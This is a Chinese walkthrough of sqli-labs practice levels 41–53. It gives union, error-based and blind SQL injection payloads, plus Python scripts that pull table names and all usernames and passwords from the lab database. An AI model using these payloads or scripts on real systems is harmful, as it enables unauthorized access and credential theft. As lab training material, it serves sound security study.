sqli.labs靶场(41-53关)

41、第四十一关

-1 union select 1,2,3--+

sqli.labs靶场(41-53关)_第1张图片

-1 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

sqli.labs靶场(41-53关)_第2张图片

-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+

sqli.labs靶场(41-53关)_第3张图片

-1 union select 1,2,(select group_concat(username,'~',password) from security.users)--+

sqli.labs靶场(41-53关)_第4张图片

42、第四十二关

这关login_password是单引号闭合,可用布尔盲注

123'+or+1=1--+ 

上脚本爆库:

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-42/login.php"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
            if len(res.text) == 1580:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user" : "admin", "login_password": f"123' or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password":  f"123' or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(41-53关)_第5张图片

43、第四十三关

这关是POST请求,login_password参数单引号加括号闭合

POC:111')--+,有报错信息,可以用报错注入

111')+and+extractvalue(1,concat(0x7e,database(),0x7e))--+

sqli.labs靶场(41-53关)_第6张图片

111')+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+

sqli.labs靶场(41-53关)_第7张图片

111')+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e))--+

sqli.labs靶场(41-53关)_第8张图片

111')+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users),0x7e))--+

sqli.labs靶场(41-53关)_第9张图片

44、第四十四关

POST请求,login_password参数单引号闭合

sqli.labs靶场(41-53关)_第10张图片

sqli.labs靶场(41-53关)_第11张图片

可以用布尔盲注,POC:123'+or+lenth(database())=1--+

这个脚本注入比较方便

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-44/login.php"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
            if len(res.text) == 1580:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user" : "admin", "login_password": f"123' or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123' or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password":  f"123' or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(41-53关)_第12张图片

45、第四十五关

这关是login_password参数单引号加括号闭合

sqli.labs靶场(41-53关)_第13张图片

sqli.labs靶场(41-53关)_第14张图片

可以使用布尔盲注POC:123')+or+substr(database(),1,1)='a'--+

脚本爆库

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-45/login.php"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr(database(),{p},1)='{a}'#", "mysubmit": "Login"})
            if len(res.text) == 1580:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user" : "admin", "login_password": f"123') or substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password": f"123') or substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            res = requests.post(url, {"login_user": "admin", "login_password":  f"123') or substr((select group_concat(username,':',password) from users),{p},1)='{a}'#", "passwd": "admin", "mysubmit": "Login"})
            if len(res.content) == 1580:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(41-53关)_第15张图片

46、第四十六关

参数是sort

sqli.labs靶场(41-53关)_第16张图片

sqli.labs靶场(41-53关)_第17张图片4+and+extractvalue(1,concat(0x7e,database()))

sqli.labs靶场(41-53关)_第18张图片

4+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))

sqli.labs靶场(41-53关)_第19张图片

4+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ))

sqli.labs靶场(41-53关)_第20张图片

47、第四十七关

sort=1

sqli.labs靶场(41-53关)_第21张图片

sort=2

sqli.labs靶场(41-53关)_第22张图片

sort=3

sqli.labs靶场(41-53关)_第23张图片

sort=4

sqli.labs靶场(41-53关)_第24张图片

应该是报错了,一共三个字段,不显示错误可以用时间盲注

sqli.labs靶场(41-53关)_第25张图片

sqli.labs靶场(41-53关)_第26张图片

48、第四十八关

和上一关差不多,这关单引号闭合

sqli.labs靶场(41-53关)_第27张图片

sqli.labs靶场(41-53关)_第28张图片

还是要时间盲注

sqli.labs靶场(41-53关)_第29张图片

脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-48/?sort=1%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(41-53关)_第30张图片

49、第四十九关

sqli.labs靶场(41-53关)_第31张图片

和48关差不多,也是时间盲注,需要单引号闭合

sqli.labs靶场(41-53关)_第32张图片

上脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-49/?sort=1%27%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(41-53关)_第33张图片

50、第五十关

sqli.labs靶场(41-53关)_第34张图片sqli.labs靶场(41-53关)_第35张图片

有报错信息,试一下报错注入

sort=10+and+extractvalue(1,concat(0x7e,database()))

sqli.labs靶场(41-53关)_第36张图片

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))

sqli.labs靶场(41-53关)_第37张图片

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))

sqli.labs靶场(41-53关)_第38张图片

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))

sqli.labs靶场(41-53关)_第39张图片

51、第五十一关

sqli.labs靶场(41-53关)_第40张图片

sqli.labs靶场(41-53关)_第41张图片sqli.labs靶场(41-53关)_第42张图片

有报错信息,还得报错注入,单引号闭合

sort=3'+and+extractvalue(1,concat(0x7e,database()))--+

sqli.labs靶场(41-53关)_第43张图片

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+

sqli.labs靶场(41-53关)_第44张图片

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+

sqli.labs靶场(41-53关)_第45张图片

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))--+

sqli.labs靶场(41-53关)_第46张图片

52、第五十二关

sqli.labs靶场(41-53关)_第47张图片

sqli.labs靶场(41-53关)_第48张图片

没有报错信息,得用盲注,时间盲注

sqli.labs靶场(41-53关)_第49张图片

上脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-52/?sort=1%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(1)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 13:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(41-53关)_第50张图片

53、第五十三关

sqli.labs靶场(41-53关)_第51张图片

sqli.labs靶场(41-53关)_第52张图片

sqli.labs靶场(41-53关)_第53张图片

sqli.labs靶场(41-53关)_第54张图片

单引号闭合,没有报错,还得是盲注

sqli.labs靶场(41-53关)_第55张图片

上脚本

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.labs/Less-53/?sort=22%27%20"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and%20substr(database(),{p},1)=%27{a}%27%20and%20sleep(0.5)--+"
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)='{a}'%20and%20sleep(0.5)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)='{a}'%20and%20sleep(0.5)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    # 获取所有账号
    users = ""
    print(f"所有用户密码:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=%27{a}%27%20and%20sleep(0.5)--+"
            num += 1
            stime = time()  # 记录开始时间
            res = requests.get(url_db)
            etime = time()  # 记录结束时间
            if etime - stime > 5:
                users = f"{users}{a}"
                print(a, end='')
                num = 0

sqli.labs靶场(41-53关)_第56张图片

你可能感兴趣的:(数据库,sql,mysql)